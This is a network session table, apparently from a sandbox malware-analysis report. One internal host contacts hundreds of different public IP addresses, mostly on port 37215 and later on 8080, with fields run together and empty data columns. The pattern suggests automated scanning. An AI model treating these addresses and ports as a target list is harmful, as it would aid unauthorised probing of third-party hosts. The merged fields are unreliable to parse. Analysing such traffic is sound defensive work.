                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24967192.168.2.2351006197.179.219.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24968192.168.2.233888041.57.53.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24969192.168.2.2336712157.24.12.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24970192.168.2.2340500157.164.190.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24971192.168.2.235421631.221.104.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24972192.168.2.2359704196.24.193.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24973192.168.2.234705241.236.167.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24974192.168.2.2346778197.55.38.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24975192.168.2.2339722157.108.135.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24976192.168.2.234704641.169.107.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24977192.168.2.2338484197.18.169.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24978192.168.2.2343036197.94.216.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24979192.168.2.2360792157.69.117.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24980192.168.2.235203088.99.35.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24981192.168.2.234717041.227.132.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24982192.168.2.235667641.58.25.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24983192.168.2.23477048.25.252.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24984192.168.2.2337626157.251.87.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24985192.168.2.235553641.138.7.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24986192.168.2.2360238157.219.7.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24987192.168.2.233854241.41.60.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24988192.168.2.233775041.24.240.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24989192.168.2.2340732157.221.74.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24990192.168.2.2356134157.122.61.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24991192.168.2.2341304199.136.93.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24992192.168.2.2349952197.48.207.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24993192.168.2.235846441.155.97.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24994192.168.2.2339792197.117.150.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24995192.168.2.2351922157.125.220.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24996192.168.2.2358518197.9.253.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24997192.168.2.2333178157.124.211.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24998192.168.2.2354286197.53.177.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24999192.168.2.235990639.189.132.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25000192.168.2.233297241.209.16.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25001192.168.2.2351756197.35.225.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25002192.168.2.235711841.207.180.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25003192.168.2.235432641.141.42.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25004192.168.2.2359060157.39.97.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25005192.168.2.233931441.89.79.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25006192.168.2.2343456157.169.100.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25007192.168.2.234723041.188.33.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25008192.168.2.233884241.79.142.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25009192.168.2.2332916197.185.207.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25010192.168.2.2355942197.214.174.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25011192.168.2.2346096197.186.196.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25012192.168.2.2359296157.102.136.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25013192.168.2.234662282.102.141.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25014192.168.2.234241299.45.36.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25015192.168.2.2356098197.151.198.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25016192.168.2.233510441.107.243.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25017192.168.2.2348022157.210.206.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25018192.168.2.2352578197.166.113.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25019192.168.2.233306441.166.5.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25020192.168.2.235751441.181.60.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25021192.168.2.2337618157.238.249.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25022192.168.2.2341164184.89.126.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25023192.168.2.235492441.94.253.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25024192.168.2.2344224197.162.222.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25025192.168.2.234018041.15.110.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25026192.168.2.2357440197.124.46.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25027192.168.2.2360234157.41.121.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25028192.168.2.233642841.199.217.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25029192.168.2.2345682157.245.24.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25030192.168.2.2351882197.175.7.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25031192.168.2.2358242137.222.225.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25032192.168.2.2344478157.247.251.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25033192.168.2.2356484116.145.161.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25034192.168.2.2344758157.38.175.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25035192.168.2.2343072197.125.151.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25036192.168.2.234063641.83.170.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25037192.168.2.2354182197.119.214.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25038192.168.2.234574441.175.39.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25039192.168.2.2349222197.226.183.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25040192.168.2.2339418176.197.4.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25041192.168.2.2334288157.105.241.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25042192.168.2.2356948197.106.253.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25043192.168.2.2343744197.136.99.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25044192.168.2.2344558197.226.38.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25045192.168.2.235426441.238.237.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25046192.168.2.2339818157.39.180.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25047192.168.2.2358846197.163.65.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25048192.168.2.235138641.210.174.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25049192.168.2.2358672166.214.131.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25050192.168.2.2360296157.14.21.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25051192.168.2.2338230157.214.65.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25052192.168.2.2351402157.21.94.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25053192.168.2.234631441.19.240.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25054192.168.2.234848435.223.177.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25055192.168.2.234488841.233.240.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25056192.168.2.2357518157.252.177.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25057192.168.2.2350450157.209.19.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25058192.168.2.2340262197.69.244.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25059192.168.2.233872241.82.29.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25060192.168.2.2333206157.56.117.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25061192.168.2.2345612157.65.25.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25062192.168.2.2337132158.41.27.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25063192.168.2.2338682157.176.120.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25064192.168.2.2347254157.40.78.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25065192.168.2.2354742157.27.12.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25066192.168.2.233509678.219.87.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25067192.168.2.2349320197.58.206.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25068192.168.2.2358934157.242.133.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25069192.168.2.2344876157.11.44.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25070192.168.2.233430841.10.1.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25071192.168.2.235567478.63.52.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25072192.168.2.2355770188.109.182.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25073192.168.2.2350438197.12.45.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25074192.168.2.235970819.236.235.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25075192.168.2.2349804176.153.157.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25076192.168.2.2339346197.246.102.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25077192.168.2.234526441.36.141.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25078192.168.2.234954241.170.202.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25079192.168.2.2347614157.140.149.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25080192.168.2.2345442163.2.5.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25081192.168.2.234952041.193.194.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25082192.168.2.2347182157.52.135.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25083192.168.2.2333218157.121.168.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25084192.168.2.2345388157.64.251.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25085192.168.2.2355794211.144.43.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25086192.168.2.234789241.0.196.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25087192.168.2.234353625.137.105.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25088192.168.2.2350624157.1.252.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25089192.168.2.2347278197.255.161.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25090192.168.2.2339740157.155.21.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25091192.168.2.2358148157.114.129.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25092192.168.2.235044041.200.34.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25093192.168.2.2342564197.251.106.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25094192.168.2.2333590197.13.34.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25095192.168.2.234112641.236.114.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25096192.168.2.235895641.58.145.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25097192.168.2.2339558174.44.107.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25098192.168.2.2343358157.51.189.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25099192.168.2.2350828190.89.233.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25100192.168.2.2347068197.49.137.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25101192.168.2.2358756157.56.128.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25102192.168.2.2341536164.124.111.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25103192.168.2.233874841.7.255.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25104192.168.2.2348280157.159.192.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25105192.168.2.2355712157.128.100.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25106192.168.2.233960650.6.175.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25107192.168.2.2337260157.175.227.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25108192.168.2.2347102140.202.240.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25109192.168.2.2356776157.178.171.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25110192.168.2.2344108197.133.124.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25111192.168.2.2352752197.140.245.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25112192.168.2.233596841.155.67.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25113192.168.2.233772041.30.237.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25114192.168.2.2348830138.197.111.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25115192.168.2.2335400157.146.62.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25116192.168.2.2354772157.237.167.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25117192.168.2.233519841.168.193.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25118192.168.2.2346202197.47.118.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25119192.168.2.2336632190.45.15.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25120192.168.2.2356818194.108.166.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25121192.168.2.235150641.22.79.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25122192.168.2.234798241.249.47.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25123192.168.2.2350222141.159.44.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25124192.168.2.2360492157.21.248.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25125192.168.2.2348392197.121.223.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25126192.168.2.235240441.6.254.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25127192.168.2.234366260.9.232.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25128192.168.2.2350786182.124.247.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25129192.168.2.2340036157.54.5.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25130192.168.2.235092841.156.225.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25131192.168.2.2344604149.29.57.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25132192.168.2.233650041.9.83.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25133192.168.2.2338938175.237.8.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25134192.168.2.23514689.77.206.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25135192.168.2.2351444152.197.107.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25136192.168.2.2349866193.251.195.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25137192.168.2.2353416135.6.103.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25138192.168.2.2337794117.232.85.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25139192.168.2.235889260.84.155.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25140192.168.2.23361245.174.66.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25141192.168.2.235392460.149.158.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25142192.168.2.2333570155.193.76.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25143192.168.2.2349836158.153.36.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25144192.168.2.236003231.118.11.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25145192.168.2.234799236.154.37.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25146192.168.2.235117013.157.220.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25147192.168.2.2350692195.185.209.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25148192.168.2.2355230146.209.225.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25149192.168.2.233716442.125.112.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25150192.168.2.2336180218.156.13.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25151192.168.2.234159289.5.103.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25152192.168.2.233304425.62.254.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25153192.168.2.2347118169.184.148.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25154192.168.2.2332968168.36.149.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25155192.168.2.2345440125.121.76.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25156192.168.2.2359728210.206.183.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25157192.168.2.2341810194.195.184.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25158192.168.2.235006814.23.56.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25159192.168.2.234357268.76.223.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25160192.168.2.2348980122.231.144.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25161192.168.2.2349736108.9.87.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25162192.168.2.2334616183.123.70.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25163192.168.2.2343002192.6.3.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25164192.168.2.2344750196.230.72.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25165192.168.2.2335808200.188.130.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25166192.168.2.234905245.0.71.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25167192.168.2.234245295.135.215.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25168192.168.2.2344454207.234.129.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25169192.168.2.234170475.143.121.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25170192.168.2.234635237.187.42.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25171192.168.2.2353820170.40.100.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25172192.168.2.2349822207.156.152.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25173192.168.2.2352524153.56.162.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25174192.168.2.23566201.129.68.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25175192.168.2.2333376146.200.161.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
